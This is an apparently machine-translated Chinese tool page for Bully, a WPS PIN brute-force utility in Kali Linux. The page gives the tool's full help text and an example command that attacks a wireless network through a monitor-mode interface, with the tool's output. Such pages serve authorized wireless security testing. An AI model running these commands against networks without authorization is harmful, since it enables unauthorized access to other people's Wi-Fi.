欺负包装说明

恶霸是一个新的实现WPS的蛮力攻击，用C语言编写的，是概念上等同于其他方案，因为它利用了（现在是众所周知的）设计缺陷的WPS规范。它拥有超过原来金甲虫代码的几个优点。这些措施包括更少的依赖，提高了内存和CPU的性能，正确处理字节序的，和一个更强大的选项。它可以运行在Linux上，并专门开发的，无论架构的嵌入式Linux系统上运行（OpenWrt的，等等）。 欺负提供了异常情况下的检测和处理了一些改进。它已经过测试，对接入点可以从众多的供应商，并与不同的配置，取得很大的成功。 资料来源：https://github.com/bdpurcell/bully/

欺负首页 | 卡利欺负回购

• 作者：布莱恩·珀塞尔
• 许可：GPLv3的

  0x01 包含在欺负包工具

  欺负 - 在WPS暴力攻击的实现，用C写的

  :~# bully -h
  usage: bully <options> interface
  Required arguments:
      interface      : Wireless interface in monitor mode (root required)
      -b, --bssid macaddr    : MAC address of the target access point
   Or
      -e, --essid string     : Extended SSID for the access point
  Optional arguments:
      -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
      -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]
      -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
      -o, --outfile file     : Output file for messages          [stdout]
      -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]
      -s, --source macaddr   : Source (hardware) MAC address      [Probe]
      -v, --verbosity N      : Verbosity level 1-3, 1 is quietest     [3]
      -w, --workdir path     : Location of pin/session files  [~/.bully/]
      -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
      -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
      -F, --force            : Force continue in spite of warnings   [No]
      -S, --sequential       : Sequential pins (do not randomize)    [No]
      -T, --test             : Test mode (do not inject any packets) [No]
  Advanced arguments:
      -a, --acktime N        : Deprecated/ignored                  [Auto]
      -r, --retries N        : Resend packets N times when not acked  [2]
      -m, --m13time N        : Deprecated/ignored                  [Auto]
      -t, --timeout N        : Deprecated/ignored                  [Auto]
      -1, --pin1delay M,N    : Delay M seconds every Nth nack at M5 [0,1]
      -2, --pin2delay M,N    : Delay M seconds every Nth nack at M7 [5,1]
      -A, --noacks           : Disable ACK check for sent packets    [No]
      -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
      -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
      -E, --eapfail          : EAP Failure terminate every exchange  [No]
      -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
      -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
      -N, --nofcs            : Packets don't contain the FCS field [Auto]
      -P, --probe            : Use probe request for nonbeaconing AP [No]
      -R, --radiotap         : Assume radiotap headers are present [Auto]
      -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
      -Z, --suppress         : Suppress packet throttling algorithm  [No]
      -V, --version          : Print version info and exit
      -h, --help             : Display this help information
  

  0x02 欺负用法示例

  通过监视器模式界面 （MON0）攻击 的无线 ESSID（-e 6F36E6）：

:~# bully -e 6F36E6 mon0
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[X] Unknown frequency '-113135872' reported by interface 'mon0'
[!] Using '00:1f:33:f3:51:13' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '6F36E6' on channel 'unknown'
[+] Got beacon for '6F36E6' (9c:d3:6d:b8:ff:56)
[+] Switching interface 'mon0' to channel '8'
[!] Beacon information element indicates WPS is locked
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '54744431'

原文来自https://www.hackfun.org/kali-tools/bully_zh.html。转载请注明原出处，商用请联系原作者授权。